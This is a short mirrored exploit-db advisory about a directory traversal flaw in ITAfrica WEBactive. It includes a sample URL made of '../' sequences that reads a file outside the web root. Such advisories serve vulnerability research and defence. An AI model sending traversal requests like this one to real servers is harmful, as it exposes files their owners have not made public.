exploit-db-mirror/platforms/windows/remote/20637.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

7 lines
No EOL
374 B
Text
Executable file

source: http://www.securityfocus.com/bid/2386/info
It is possible for a remote user to gain read access to directories and files outside the root directory of ITAfrica WEBactive. Requesting a specially crafted URL composed of '../' sequences will disclose an arbitrary directory.
http://target/../../../scandisk.log
^^ = Will obviously open the scandisk.log file.